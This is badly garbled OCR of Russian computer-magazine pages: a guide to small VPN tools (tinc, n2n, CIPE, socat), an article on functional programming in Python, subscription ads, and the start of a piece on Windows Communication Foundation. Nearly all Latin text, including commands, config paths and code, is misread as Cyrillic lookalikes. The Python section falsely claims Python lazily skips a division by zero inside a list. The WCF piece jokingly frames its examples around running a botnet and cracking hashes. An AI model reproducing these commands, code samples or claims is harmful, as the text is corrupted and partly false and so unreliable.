# Рогтлагбіпд = <обб I іпбегпаі I кегпе1> 

На самом деле все параметры не нужны. В самых простых случаях доста- 
точно оставить первые пять директив. Данные о конкретныхузлах сети 
прописываются в подкаталоге бозіз, в нашем примере мы должны создать 
два файла: ту_ѵрп иѵрпОІ. 

$ зисіо папо/еІсАіпс/ѵрппеІ/Ііо5І5/ту_ѵрп 

# ІР адрес или имя узла 
Аббгезз = 1 . 2 . 3 . 4 

# локальная сеть, используется для маршрутизации 
ЗиЪпеб = 192.168.1.0/24 

# использование ТСР 

# ТСРОпІу = уез 

Второй файл практически аналогичен, поэтому в примере оставлютолько 
адрес. 

$ зибо папо /ебс/біпс /ѵрппеб /бюзбз /урпОІ 
Аббгезз = урпОІ .туботаіп. ги 

Поумолчаниюбпсиспользуетпортббб; если он занят или блокируется 
файеромдоего можно изменить, указав нужноезначение в параметре РогЕ 
Крометого, в файлахузлов хранится публичный ключ (заносится автомати- 
чески при создании]. 

Генерируем ключ: 

$ зибо біпсб -п ѵрппеб -К 
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Запускаем вирегпосіе в отладочном режиме 





Единственной документацией на апѵШп являются 
тап-странииы 



В процессе работы скрипт спросит, куда сохранить приватный и публичный 
ключи. 

Также для каждой сети следует настроить скрипты, обеспечивающие 
поднятие/остановку нужного интерфейса и маршрутизацию при включе- 
нии ѴРІЧДіпс-ирЛіпс-сІоѵѵп, ЬозІ-ир/зиЬпеІ-сІоѵѵп, зибпеІьир/зиЬпеІхіоѵѵп. 
Опятьже, не все они обязательны. 



не используют в угоду меньшему потреблен ию системных ресурсов. 

Для организациитуннеля в І_іпих, *В50, МасОВХ, ѴѴіпсІоѵѵз (доступен ОШ) и 
ОрепѴѴРТ задействуются ТІІЫ/ТАР-драйвера. 

Установка в ОеЬіап/ІІЬипШ проста: 

$ зисіо арС-дек іпзкаіі п2п 



$5ис1опапо/еІсЛіпс/ѵрппеіЛіпс-ир 

# ! /Ъіп/зЪ. 
тосіргоЪе Тип 

іісопіід $ШТЕКРАСЕ 192.168.1.10 пектазк 255.255.255.0 
Все, можно запускать: 



После чего в системе появятся два исполняемых файла — зирегпосіе и 
ебде. Никаких конфигов Ы2Ы не использует. Запускаем зирегпосіе, указав в 
качестве параметра '-Г порт, на котором демон будет принимать подключе- 
ния. На первых порах для получения более подробной информации лучше 
использовать ключ ’-ѵ'. Обрати внимание: права суперпользователя не 
требуются. 



$ зисіо /еСс/іпіР . сі/Ріпс зСагР 



$ зирегпосіе -1 7 654 -ѵ 



Процесс подключения будет отображен в логах, команда ібсопбід покажет 
новое соединение. Если что-то пошло нетак, запускаем демона в режиме 
отладки: 

$ зисіо Ріпссі -п ѵрппек -сі5 -Б 

Ы2Ы 

Проект Ы2Ы ( пеіл/ѵогкіо пеіѵѵогк. п1ор.ога/п2п ) предлагает решение, 
позволяющее создать ѴРІЧ-соединение между двумя и более сетями. Для 
обмена данными используется Р2Р-архитектура, поэтому участники после 
подключения отправляютинформацию напрямую. Конечный компьютер 
(Ебде ІМобе) может одновременно быть подключен к нескольким таким 
сетям. Обмен происходитпри помощи ІЮР-пакетов. Процессом установле- 
ния связи управляетспециальный узел зирегпосіе, он же используется как 
промежуточный в тех случаях, когда Ебде ІЧосІе не могут взаимодействовать 
напрямую. Причем в обязанности зирегпосіе не входит функция автори- 
зации, то есть ника кихучетныхданныхдля соединения он не содержит, 
клиенты сами договариваются между собой после подключения. Если па- 
роли совпадают, происходит поднятие ѴРІ\І. Такой подход упрощает работу 
в случае недоступности одного из зирегпосіе — просто выбираем другой и 
подключаемся через него. Зирегпосіе не совмещает в себе функции Ебде 
ІЧобе, при необходимости клиентзапускают отдельно. 

Сточки потребления трафика держать подобный туннель постоянно 
открытым довольно накладно (все время идетобращение кзирегпобе), 
поэтому его используют для кратковременных сеансов. Ксожалению, в 
N214 есть минусы и сточки зрения безопасности. Так, пароли указываются 
в командной строке, поэтому их легко подсмотреть в хистори. Надо сказать, 
Ы2Ы особенно полюбился любителям игр, для которых безопасность не яв- 
ляется основным критерием при выборе ѴРЫ, и шифрование часто вообще 



Для подключения кѴРЫ-сети используется команда ебде, параметров у нее 
больше. Основными ЯВЛЯЮТСЯ: 

-а — свой ІР-адрес, который декларирует клиент для подклю- 
чения к ѴРЫ-сети; 

-с — название виртуальной подсети; 

-к — ключ для подключения к ѴРБ-подсети; 

-1 — данные зирегпосіе. 

Например, зарегистрируем на зирегпосіе два узла побеі и побе2. Вводим 
на каждом: 

посіе1$ зисіо есіде -а 10 . 1 . 2 . 1 -с шупеШогк -к епсгуркше -1 
1.2.3.4:7654 

посіе2$ зисіо есіде -а 10.1.2.2 -с тупекмогк -к епсгуркте -1 
1.2.3.4:7654 

В консоли получаем сообщение «Редізіегіпд ѵѵкб зирегпосіе», команда 
ТсопЕд покажет наличие интерфейса ебдеО суказанными выше парамет- 
рами. Каквидишь, команды, введенные на разныхузлах, отличаются лишь 
объявляемым ІР. Также в командной строке можноуказать: 

-к — использовать НТТР-туннель (экспериментальная возмож- 
ность) ; 

-г — активировать форвардинг/роутинг пакетов (эта функция 
позволяет подключиться не только к Есіде Ыосіе, но и к уда- 
ленной сети) ; 

-1 — запустить процесс в виде демона; 

-сі — указать ТАР-устройство (полезно при одновременной 
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Скриншот от редактора: настройка сервера ОрепѴРЫ 
для сетевой игры в НММЗ 



Самый маленький ѴРМ 



апукіп-О.З.ЗТапдг — 1 1 0 Кб 
ѵіип-З.О.ІТаг.дг — 122 Кб 
сіре-І.бШаг.дг — 139 Кб 
Епс-1 .О.Шаг.дг — 497 Кб 
п2п_зѵп_2307201 ОТдг - 535 Кб 
зосаі-і .7.1 .2Таг.дг — 542 Кб 
орепѵрп-2. 1 . 1 Даг.дг — 860 Кб 



Апуса$1 

Популярность ѴоІР и подобных сервисов сегодня высока какникогда. 
Единственный минусдля клиента, работающего через ѴРІ\І — при 
недоступности одного сервера он вынужден подключаться кдругому. 
Апусазі-рассылка позволяет клиенту не беспокоиться о работоспо- 
собности конкретного сервиса, ведь пакет в любом случае дойдет 
до «кого-нибудь» из группы серверов. Чтобы работать через ѴРЫ с 
апусазр нужен специальный протокол, итакой протокол, описываю- 
щий принцип соединения ипісазі и апусазі-сетей, разработан и по- 
лучил название 5АТР (Весите АпусазіТиппеІіпд Ргоіосоі). Реализация 
ЗАТРи лежит в основе проекта а пуіип (апуіип.огд). Поддерживается 
автоматическая маршрутизация при помощи Оиадда, использование 
ІЮРпозволяетапусазІ: «дружить» с ІЧАТ. Па кет доступен в репозито- 
рияхосновныхдистрибутивов. Ксожалению, справочная информация 
на сайте проекта только на немецком, поэтому при настройке альтерна- 
тивы тап просто нет. 



работе с несколькими сетями) . 

Стоит отметить, имеется реализация Р2РѴРКІ, котораятаки называется 
— Р2РѴРІЧ [р2рѵрп.огд ]. Основная ее особенность — возможность работы 
без центрального сервера. Написана на Заѵа и теоретически может быть 
запущена на любой платформе, для которой доступна За ѵа РЕ. Официально 
поддерживаются 32-битные версии Еіпих и ѴѴіпсІоѵѵз. Для аутентификации 
используется Р5А (1024 бит], трафик шифруется при помощи АЕ5 (128 бит]. 



СІРЕ 



П р и н ци п ра боты С I Р Е ( С гу рІо I Р Е п са р з и Іа 1 і о п , гіЕез .. пкаДе/Ьщгеб/ 
сІеѵеІ/сіре.ЫппІ ] очень прост. Шифрованные при помощи протокола 
СІРЕ (текущая версия СІРЕѵЗ] ІР-пакеты инкапсулируются в ІЮР-да- 
та граммы, результирующий пакет включает информацию о получате- 
ле. Обмен происходит через виртуальное устройство сірсбх. Данные 
шифруются динамическими 128-битными ключами (ВІоѵѵЕзЬ, ЮЕА], 
при необходимости используется сжатие. Сам протокол СІРЕоткрыти 
документирован, обычно это положительно сказывается на безопас- 
ности конечного решения. 

Еще один из немаловажных плюсов СІРЕ — его «дружба» с ІЧАТ и 
50СК5, что часто используется при организации подключения из 
труднодоступных мест. Например, там, где провайдеры блокируют 
протоколы СРЕ или любые нестандартные порты. 

Изначально СІРЕ разработан сучетом применения в Еіпих, но доступен 
порт сторонних разработчиков для ѴѴіпІ\ІТ4.05РЗ/5Р6. ѴѴіп2к (сіре- 
уѵіп32.зЕпеі ). 

Минус — проект практически прекратил свое развитие (последнее 
обновление было в 2002 году], очевидно, поэтому СІРЕубрали из ре- 
позиториев многих дистрибутивов. Так, в ІІЬипІи пакеты сіре-соттоп 
и сіре-зоигсе были доступны еще в версии 6.06 (йаррег 0 гаке), в 
более новых релизах пользователям СІРЕ приходится собиратьего 
самостоятельно. 



дачу данных между двумя различными каналами данных: сокет (ІЮР.ТСР, 
ШІ N IX, ІР4, ІР6, гаѵѵ] , псевдотерминал, файловый дескриптор, программа и 
другие, а также их комбинация. Пользователи обычно применяют 50саІ в 
качествеТСР-прокси для соксификации приложений, какшелл кЕІпіх-со- 
кету.для обхода файера и такдалее. С его помощью легко соединить два 
узла, а используя 55Е — защитить соединение между двумя зосаЕ Сейчас 
рассмотрим, как это можно сделать. 

В репозитории ОеЬіап/ІІЬипІи программы нет, ноустановка стандартна. 

В файле ЕХАМРЕЕ5, который найдешь в архиве, доступны все варианты 
использования программы. Для примера поднимем ТІІІЧ-сервер, который 
будет слушать порт 5555 : 

$ зисіо зосаЕ -сі -сі ТСР-ЫЗТЕЫ: 5555 , геизеасісіг 
ТШ:192 .168. 1.1/24, ир 

Подключаемся кнемусдругого компьютера, указав в параметреТСР-адрес 
и портудаленной системы: 

$ зосаЕ ТСР:1. 2. 3.4:5555 ТШ: 192 . 168 . 255 . 2/24 ,ир 

Команда «іЕсопЕід ШпО» покажет наличие рабочего интерфейса. 
Использование ВВИта кже не вызывает сложностей. Активируем сервер: 

$ зисіо зосаЕ орепззІ-ІізЕеп: 4444 , геизеасісіг , сегЕ=/еЕс/ѵрп/ 
зегѵег .реш, саЕі1е=/еЕс/ѵрп/с1іепЦ . сгЕ есЬо 

Подключаемся клиентом: 

$ зисіо зосаЕ зЕсііо орепззІ-соппесЕ : ехашріе . ги : 4444 , сегЕ=/ 
еЕс/ѵрп/сІіепЕ .реш, саЕі1е=/еЕс/ѵрп/зегѵег . сгЕ 



СЕМЕЙСТВО МЕТСАТ — 50САТ 

Любой юниксоид знает, что, если ему нужна утилита, позволяющая устано- 
витьТСР/ШР-соединение с нужными параметрами, передавать/прини- 
мать данные, следует выбрать пеІсаЕ С ее помощью можно легко настроить 
прокси и подключаться кудаленному сервису. И хотя она уже давно не раз- 
вивается (с января 2004 года], ответвления (форки] возникаютс завидной 
регулярностью: ОрепВВО пеісаі, КІсаЕ Сгурісаі, зосаЕ 
Так, зосаі (ѵѵѵѵѵѵ.сІезІ-ипгеасЬ.ога/зосаІ:/) обеспечиваетдвѵстороннюю пере- 



Осталось добавить, что зосаі поддерживает Еіпих, *В50, ОрепЗоІагіз, Мае 
05Хи Судѵѵіп. 

ЗАКЛЮЧЕНИЕ 

Рассмотреть все предложения в рамках одной статьи невозможно. На про- 
сторах интернета можно найти еще как минимум десяток реализаций, кото- 
рые помогают быстро и безлишнихтелодвижений поднять ѴРЫ. Надеюсь, 
среди представленных вариантовты уже нашел наиболее подходя ши й. т 
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■ ■Александр Краснощеков акгазпозсНекоѵГСдтаіІ.сот 



КОДИМ НА РУТНОМ 
ПО-ФУНКЦИОНАЛЬНОМУ 

Познаем силу функциональной парадигмы 
программирования 



Язык РуІНоп не зря пользуется популярностью в среде программистов 
Гугла и редакторов Хакера одновременно :). Этот поистине мощный 
язык позволяет писать код, следуя нескольким парадигмам, и сегодня 
мы попробуем разобраться, в чем же между ними разница, и какой из 
нихлучше следовать. 



КАКИЕ ПАРАДИГМЫ?! ДАВАЙТЕ КОДИТЬ! 

Когда тебе надо написать что-то, то ты, наверное, меньше всего замо- 
рачиваешься относительно того, какую парадигму программирования 
выбрать. Скорее, ты либо выбираешь наиболее подходящий язык, либо 
сразу начинаешь кодить на своем любимом, предпочитаемом и годами 
проверенном. Оно и верно, пусть об идеологии думают идеологи, наше 
дело — программить :]. И все-таки, программируя, ты обязательно сле- 
дуешь какой-либо парадигме. Рассмотрим пример. Попробуем написать 
что-нибудь простое... ну, например, посчитаем площадь круга. Можно 
написать так: 

Площадь круга (вариант первый) 

сЗоиЫ е агеа_оі_сігс1е (<іоиЬ1е г) { 
г е ' : : и г М_Р I *ром ( г , 2 ) ; 

} 

іпС шаіп ( ) { 

сіоиЪІе г = 5 ; 

соиС « "Площадь: "« агеа_оі_сігс1е (г ) << епсіі; 

} 

А МОЖНО И так: 

Площадь круга (вариант второй) 

сіазз Сігсіе { 
йоиЫе г; 
риЫіс : 

Сігсіе (сіоиЫе г) { Ыіз->г = г; } 

сіоиЫе агеа() { геСиг М_РІ*ро\г (СМз->г ,2) ; } 

ѵоісі ргіпС_агеа() { 



соиС « "Площадь: " « СМз->агеа ( ) « епсіі; 

} 

} ; 

іпР гпаіп ( ) { (пем Сігсіе (5) ) ->ргіпС_агеа (); } 

Можно и по-другому... но только как не старайся, код будет или императив- 
ным (как в первом случае], или объектно-ориентированным (как во втором]. 
Это происходит не из-за отсутствия воображения, а просто потому, что С++ 
«заточен» под эти парадигмы. 

И лучшее (или худшее, в зависимости от прямоты рук], что с его помощью 
можно сделать — это смешать несколько парадигм. 

ПАРАДИГМЫ 

Как ты уже догадался, на одном и том же языке можно писать, сле- 
дуя нескольким парадигмам, причем иногда даже нескольким сразу. 
Рассмотрим основные их представители, ведь без этих знаний ты никогда 
не сможешь считать себя профессиональным кодером, да и о работе в 
команде тебе тоже, скорее всего, придется забыть. 

Императивное программирование 

«Сначала делаем это, потом это, затем вот это». 

Языки: Почти все 

Абсолютно понятная любому программисту парадигма: «Человек дает 
набор инструкций машине». С императивной парадигмы все начинают 
учить/понимать программирование. 

Функциональное программирование 

«Считаем выражение и используем результат для чего-нибудь еще». 
Языки: Назкеіі, Егіапд, Р# 
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Практика функционального программирования 



Журнал потеме. Выглядит гружено! 




> СІѴСІ 

На диск я положил 
свежие дистрибутивы 
питона для винду- 
соидов. Л инуксоидам 
помощь не нужна :). 



Абсолютно непонятная начинающему программисту парадигма. 
Мы описываем не последовательность состояний (как в 
императивной парадигме], а последовательность действий. 

Объектно-ориентированное программирование 

«Обмениваемся сообщениями между объектами, моделируя 
взаимодействия в реальном мире». 

Языки: Почти все 

Появившись, объектно-ориентированная парадигма прочно 
вошла в нашу жизнь. 

На ООП построены практически все современные бизнес- 
процессы. 

Логическое программирование 

«Отвечаем на вопрос поиском решения». 

Языки: Ргоіод 

Логическое программирование — довольно специфическая 
штука, но, в то же время, интересная и интуитивно понятная. 
Достаточно простого примера: 

Иллюстрация к фильму Монти Пайтона на Ргоіод'е 

{задаем правила) 

тШсЪЦХ) <= Ьигпз (X) апб бетаІе(Х). 

Ьигпз (X) <= ѵ\гообеп(Х) . 
жэобеп(Х) <= біоабз (X) . 
біоабз (X) <= з аглете і дЬб (биск, X). 

{задаем наблюдения) 
бетаіе (дігі) . 
затемеідЪ.6 (биск, дігі) . 

{задаем вопрос) 

? ѵгібсЬ (дігі ) . 

В то время, как каждый программист по определению знаком 
с императивным и объеетно-ориентированным программи- 
рованием, с функциональным программированием в чистом 
виде мы сталкиваемся редко. Функциональное программиро- 
вание противопоставляют императивному. 

Императивное программирование подразумевает последо- 
вательность изменений состояния программы, а переменные 
служат для хранения этого состояния. 

Функциональное программирование, наоборот, предусматри- 
вает последовательность действий надданными. Это сродни 
математике — мы долго пишем на доске формулу Г(х], а потом 
подставляем х и получаем результат. 

И вся соль функционального программирования в том, что 
здесь формула — это инструмент, который мы применяем к 
иксу. 



ДВУЛИКИЙ ПИТОН 

Нет лучшей теории, чем практика, так что давай уже что- 
нибудь напишем. А еще лучше — напишем на питоне :]. 
Посчитаем сумму квадратов элементов массива «сІаТа» импе- 
ративно и функционально: 

Императивный Питон 

баба = [ . . . ] 
зиш = О 

бог еіетепб іп а: 

зшп += еіетепб ** 2 
ргіпб зшп 

Функциональный Питон 

баба = [ . . . ] 

зд = ІатЬба х: х**2 

зиш = ІашЬба х,у: х+у 

ргіпб гебисе(зит, шар(зд, баба)) 

Оба примера на питоне, хотя я и не включил его в список 
функциональных языков. Это не случайность, поскольку 
полностью функциональный язык — довольно специфичная и 
редко используемая штука. Первым функциональным языком 
был Ызр, но даже он не был полностью функциональным (ста- 
вит в тупик, не правда ли?]. 

Полностью функциональные языки используются для всякого 
рода научных приложений и пока не получили большого рас- 
пространения. 

Но если сами «функционалы» и не получили широкого рас- 
пространения, то отдельные идеи перекочевали из них в 
скриптинговые (и не только] языки программирования. 
Оказалось, что совершенно необязательно писать полностью 
функциональный код, достаточно украсить императивный код 
элементами функционального. 

ПИТОН В ДЕЙСТВИИ 

Оказывается, концепции ФП реализованы в Питоне более чем 
изящно. Ознакомимся с ними подробнее. 

^-исчисления 

І_атЬсІа исчисления — это математическая концепция, кото- 
рая подразумевает, что функции могут принимать в качестве 
аргументов и возвращать другие функции. 

Такие функции называются функциями высших порядков, 
^-исчисления основываются на двух операциях: аппликация и 
абстракция. Я уже привел пример аппликации в предыдущем 
листинге. Функции тар, гебисе — это и есть те самые функции 




НТТР://ѴШѴѴ 

■і Г 

> Ііпкз 

• Несколько хороших 
ресурсов для тех, 
кому хочется узнать 
больше: 

ЬирТ/ѵѵѵѵѵѵ. руіЬо п.огд 

ШрУ/еп.ѵѵікіребіа. 

огд/ѵѵікі 

• Ргодгаттіпд_ 
рагабідт 

ЬбрТ/ѵѵѵѵѵѵ.іЬт.сот/ 

беѵеіорегѵѵогкз/ 

ІіЬга гу/1-ргод.Ы:т[ 




> іпіо 



Если тебе не при- 
глянулся питон, не 
расстраивайся —ты 
можешьуспешно 
применять идеи 
функционального 
программирования 
и в других языках 
высокого уровня. 
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Поддержка парадигм в языках программирования 



высших порядков, которые «апплицируют» (или применяют) переданную в 
качестве аргумента функцию к каждому элементу списка (для тар) или каж- 
дой последовательной паре элементов списка (для гесіисе). 

Что касается абстракции — здесь наоборот, функции создают новые функ- 
ции на основе своих аргументов. 

І_атЬс1а-абстракция 

сіеі асісі(п) : 

геСигп ІашЬсІа х: х + п 
асМз = [асМ(х) Тог х іп хгапде(ІОО)] 
асМз [34] (5) 

Здесь мы создали список функций, каждая из которых прибавляет к аргу- 
менту определенное число. 

В этом маленьком примерчике также уместилась еще пара интересных 
определений функционального программирования — замыкание и кар- 
ри н г. 

Замыкание — это определение функции, зависящей от внутреннего 
состояния другой функции. В нашем примере это ІатЬсІа х. С помощью 
этого приема мы делаем что-то похожее на использование глобальных 
переменных, только на локальном уровне. 

Карринг — это преобразование функции от пары аргументов в функцию, 
берущую свои аргументы по одному. Что мы и сделали в примере, только 
у нас получился сразу массив таких функций. Таким образом, мы можем 
написать код, который работает не только с переменными, но и с функция- 
ми, что дает нам еще несколько «степеней свободы». 

Чистые функции и ленивый компилятор 

Императивные функции могут изменять внешние (глобальные) перемен- 
ные, и это значит, что функция может возвращать различные значения 
при одних и тех же значениях аргумента на разных стадиях выполнения 
программы. 

Такое утверждение совсем не подходит для функциональной парадигмы. 
Здесь функции рассматриваются как математические, зависящие только 
от аргументов и других функций, за что они и получили прозвище «чистые 
функции». 

Как мы уже выяснили, в функциональной парадигме можно распоряжаться 
функциями как угодно. Но больше всего выгоды мы получаем, когда пишем 
«чистые функции». 

Чистая функция — это функция без побочных эффектов, а значит, она не 
зависит от своего окружения и не изменяет его состояния. 

Применение чистых функций дает нам ряд преимуществ: 

• Во-первых, если функции не зависят от переменных окружения, то мы 
уменьшаем количество ошибок, связанных с нежелательными значениями 
этих самых переменных. 

Вместе с количеством ошибок мы уменьшаем и время отладки программы, 
да и дебагить такие функции гораздо проще. 

• Во-вторых, если функции независимы, то компилятору есть где разгу- 
ляться. Если функция зависит только от аргументов, то ее можно посчитать 



только один раз. В следующие разы можно использовать кэшированное 
значение. Также, если функции не зависят друг от друга, их можно менять 
местами и даже автоматически распараллеливать. 

Для увеличения производительности в ФП также используются ленивые 
вычисления. Яркий пример: ргіпі ІепдіЬ([5, 4/0, 3+2]). 

По идее, на выходе мы должны получить ошибку деления на ноль. Но 
ленивый компилятор питона просто не станет вычислять значения каждого 
элемента списка, так как его об этом не просили. Нужна длина списка — 
пожалуйста! 

Те же принципы используются и для других языковых конструкций. 

В результате несколько «степеней свободы» получает не только програм- 
мист, но и компилятор. 

Списочные выражения и условные операторы 

Чтобы жизнь и программирование показались тебе медом, разработчики 
питона придумали специальный «подслащающий» синтаксис, который 
буржуи так и называют — «зупФсбс зидаг». 

Он позволяет избавиться от условных операторов и циклов... ну, если не 
избавиться, то уж точно свести к минимуму. 

В принципе, ты его уже видел в предыдущем примере — это асісіз = ЫсІ(х) 
іогх іп хгапде(ЮО)]. Здесь мы сразу создаем и инициализируем список 
значениями функций. Удобно, правда? 

Еще есть такая штука, как операторы апб и ог, которые позволяют обхо- 
диться без громоздких конструкций типа і^-еііб-еізе. 

Таким образом, с помощью инструментария питона можно превратить гро- 
моздкий императивный кусок кода в красивый и функциональный. 

Императивный код 

ь = о 

Тог х іп хгапде(ІО): 

ІТ х % 2 == 0: 

ІТ х**2>=50 : 

Іі. аррепсі (х) 
еізе : 

Ь. аррепсі (-х) 
ргіпТ Ь 

Функциональный код 

ргіпТ [х**2>=50 апсі х ог -х Тог х іп хгапде(ІО) ІТ 
х%2==0 ] 

ИТОГИ 

Как ты уже понял, необязательно полностью следовать функциональной 
парадигме, достаточно умело использовать ее в сочетании с императив- 
ной, чтобы упростить себе жизнь. Однако, я все время говорил про импе- 
ративную парадигму... и ничего не сказал про ООП и ФП. 

Что ж, ООП — это, фактически, надстройка над императивной парадигмой, 
и если ты перешел от ИП к ООП, то следующим шагом должно быть при- 
менение ФП в ООП. В заключение скажу пару слов об уровне абстракции. 
Так вот, чем он выше — тем лучше, и именно сочетание ООП и ФП дает 
нам этотуровень. т 
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ПОДПИШИСЬ! 

вИор.дІс.ги 



ВЫГОДА + ГАРАНТИЯ 

Редакционная подписка без посредников - это гарантия 
получения важного для Вас журнала и экономия до 40% 
от розничной цены в киоске 




6 номеров 1 300 руб. 
1 2 номеров 2300 руб. 



6 номеров 1 300 руб. 
1 2 номеров 2300 руб. 



6 номеров 960 руб. 
12 номеров 1740 руб. 



6 номеров 1260 руб. 
12 номеров 2310 руб. 



6 номеров 1130 руб. 
1 2 номеров 2060 руб. 




6 номеров 1110 руб. 
12 номеров 2016 руб. 



6 номеров 785 руб. 

1 2 номеров 1 420 руб. 



6 номеров 890 руб. 
12 номеров 1630 руб. 



3 номера 630 руб. 

6 номеров 1140 руб. 



6 номеров 900 руб. 
12 номеров 1720 руб. 
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6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 



6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 



6 номеров 1 040 руб. 
12 номеров 1880 руб. 



6 номеров 765 руб. 
12 номеров 1380 руб. 



6 номеров 630 руб. 
12 номеров 1130 руб. 





только на сайте 

4 номера 556 руб. 

8 номеров 1008 руб. 



2 номера 284 руб. 




6 номеров 81 0 руб. 

1 2 номеров 1 470 руб. 



6 номеров 564 руб. 
13 номеров 1105 руб. 



6 номеров 450 руб. 
13 номеров 975 руб. 
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Ёз 


ШГ 




6 номеров 2205 руб. А* 1, 

1 2 номеров 3890 руб. 


Гряі 6 номеров 2150 руб. 

1 2 номеров 3930 руб. 




6 номеров 
12 номеров 


2178 руб. 
3960 руб. 



(дате)іамі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 
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ѴМоѵѵ$ Соттипісаііоп Роипсіаііоп: сложные 
транзакционные системы по-быстрому 

Будущее настало. СІоисІ Сотриііпд доступен массам, а распределенная 
архитектура теперь является естественной потребностью не 
только крупных организаций, но и самых что ни на есть рядовых 
граждан. Сегодня мы рассмотрим систему быстрого развертывания 
распределенных приложений в домашних условиях. 



В рамках этой статьи мы продолжим знакомиться со спектром тех- 
нологий платформы .ЫЕТ Егатеѵѵогк. Одна из прошлых статей была 
посвящена .ЫЕТ Ретобпд — принципу построения сетевых прило- 
жений, на основе которого мы организовали полноценную систему 
распределенных вычислений. Однако Місгозо^ не стала ограничи- 
вать фантазию разработчика одним «ремоутингом», который упро- 
щает разработку сетевых приложений и предоставляет широкий 
инструментарий для обмена данными между клиентской и сервер- 
ной частью, но все же остается ограниченным рамками архитектуры 
«клиент-сервер». С ростом функционала проектируемого приложе- 
ния растет количество его функциональных элементов, роль которых 
уже далека от классического представления. 

Целый набор технологий построения безопасных систем с рас- 
пределенной архитектурой, в том числе и концепция упомянутой 
Ветобпд, вошли в состав фреймворка ѴѴіпсІоѵѵз Соттипісабоп 
Еоипбабоп, который, в свою очередь, входит в .ЫЕТ Егатеѵѵогк. 
Разработчику предоставляется единая среда создания, поддержки 
и развертывания веб-служб, каждая из которых функционирует 
по принципу «доступна всем», то есть имеет полностью открытые 
интерфейсы для функционирования с другими системами без каких- 



либо ограничений к своей внутренней архитектуре. Таким образом, 
прослеживается связь с технологией, которая имеет модное назва- 
ние «сІоисІ сотріЛіпд» — служба предоставляется как сервис, а, 
значит, предоставляются компьютерные ресурсы и вычислительные 
мощности. И кто сказал, что вычисления в облаке — удел крупных 
компаний? 

Однако инструментарий для программирования систем распреде- 
ленных транзакций — не единственная область ѴѴСЕ. Эта технология 
также обеспечивает поддержку удобной работы в веб-среде. Модель 
программирования, которая гордо называется ѴѴСЕ ѴѴЕВ НТТР, 
сочетает в себе необходимые для создания многофункциональных 
веб-приложений технологии обработки данных: поддержка команд 
получения/изменения/вызова данных (СЕТ и Р05Т], обработка уни- 
фицированных локаторов ресурсов (ІІВІ), поддержка нескольких 
различных типов данных (документы ХМЕ, объекты А^Х и Э50 N , 
сообщения 50АР]. Имеются также средства обеспечения конфи- 
денциальности, целостности и аутентификации. Теперь проблема 
разграничения доступа к административной части твоей бот-сети 
не ограничивается банальной передачей пары «логиншароль» 
авторизационной форме. Более того, процесс авторизации может 
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Взаимодействие клиента и сервиса осно- 
вано на трех элементах оконечной точки 



проходить вообще без классической схемы с паролями. 
Кстати говоря, грамотно спроектированная политика 
разграничения доступа (бот, админ, гость, правоохрани- 
тельный орган) в системе с распределенной архитекту- 
рой — один из ключевых аспектов, требующих отдельно- 
го внимания. 

Прежде чем приступить к обзору средств ѴѴСР для 
построения приложений с распределенной архитекту- 
рой, рассмотрим подходы к реализации этих архитектур. 

ДВА САПОГА... 

Для начала ознакомимся с двумя фундаментальными 
методиками организации любой распределенки. 

В распоряжении архитектора распределенных систем 
имеются два подхода: 50АР и ЕЕЕТ. 

50АР (Еітріе ОЬіесІ Ассезз Ргоіосоі) — классический 
подход, в общем случае представляющий собой обмен 
сообщениями в распределенной инфраструктуре. Одной 
из реализаций данного подхода является уже упомяну- 
тая технология .ІЧЕТ РетоЕшд. 

Рассмотрим организацию 50АР на простом примере. 
Пусть имеется некоторый «Сервис», предоставляющий 
методы с описанной в специальном формате струк- 
турой. В нашем случае Сервис предоставляет метод 
«Ѳе1;ВаІапсе(іп1: АссоипШ]» получения баланса на 
запрашиваемом аккаунте. Клиент генерирует специаль- 
ный запрос и отправляет его в составе НТТР-пакета 
Сервису: 

Структура 50АР-запроса 

//стандартные НТТР-заголовки 

ЗОАРАсРіоп: СеСВаІапсе 
/ /ЗОАР-конверт 

<зоар: Епѵеіоре хтіпз: зоар ...> 

//тело ЗОАР-запроса 
<зоар: Восіу> 
сСеРВаІапсе хтіпз = ...> 

<АссоипР>2</АссоипР> 

</СеРВа1апсе> 

</зоар: Вос1у> 

</зоар: Епѵе1оре> 

Формат ЕОАР-ответа формируется аналогичным обра- 
зом. Подход РЕЕТ (ПергезепІаЕюпаІ Еіаіе ТгапзГег) 

— альтернатива 50АР. Данный архитектурный стиль 
построен на таких стандартах, как НТТР, ЕІРІ, ХМЕ. 
Акцент в этом подходе сделан не на исполнении 
удаленных сервисов, как в ЕОАР, а на доступе к необ- 
ходимым ресурсам с помощью их унифицированных 
локаторов, называемых ІІРІ. Для вызова методов и 
получения/изменения каких-либо данных происходит 




ДЯжтшЬЯМа Ц№/ѴшѴ 
<0нті#г>М*іѵгоіІ2.</&гаиЕ> 

</АесвивЬ> Ассѵи'ліЗ 



Схема организации подхода КЕ5Р 



обращение к сервису с помощью стандартных НТТР- 
глаголов (СЕТ, РОЕТ, РЕІТ, ОЕЕЕТЕ). Каждый объект 
кодируется уникальным II РЕ, например: ѵѵѵѵѵѵ.зегѵісе- 
зіІе.сопл/АссоипІз/2. 

Таким образом, данные, полученные по указанному 
II РЕ, при повторном обращении к ним могут быть кэши- 
рованы. 

На первый взгляд разница несущественна, ведь так 
или иначе клиент получает необходимые ему данные, 
однако результаты проектирования системы в соот- 
ветствии с этими подходами кардинально отличаются. 
Непосредственное обращение к ресурсам сервиса с 
помощью РЕЕТ-подхода позволяет поднять степень 
конфиденциальности клиентской стороны, так как 




> Дуй 



На диске тебя ждет 
пример клиент- 
сервисного прило- 
жения. Рекомендую 
разобраться в значе- 
нии каждой строчки 
кода. 



50АР — классический 
подход в общем случае 
представляющий собой 
обмен сообщениями 
в распред еленной 
инфраструктуре 



запросы могут фиксироваться исключительно на сто- 
роне веб-службы, чего не скажешь о ЕОАР-аналоге, 
где происходит непосредственный обмен пакетами 
между клиентской и серверной частью. Еще один 
аргумент не в пользу ЕОАР: обязательный разбор 
клиентом полученного ХМЕ-кода требует определен- 
ных трудозатрат, что плохо сказывается на масштаби- 
руемости задачи. РЕЕТ в этом плане более практичен 
и не требует специальных оптимизационных меро- 
приятий. 

Короче говоря, выбор того или иного подхода должен 
быть основан, прежде всего, на особенностях решаемой 
задачи. Например, организация дгісі-системы, занимаю- 
щейся поиском коллизии М05-хешей, и абсолютно неле- 
гального ботнета, организующего распределенный поиск 
заветной «строчки» по известному М05-хешу — задачи, 
требующие индивидуального подхода. 

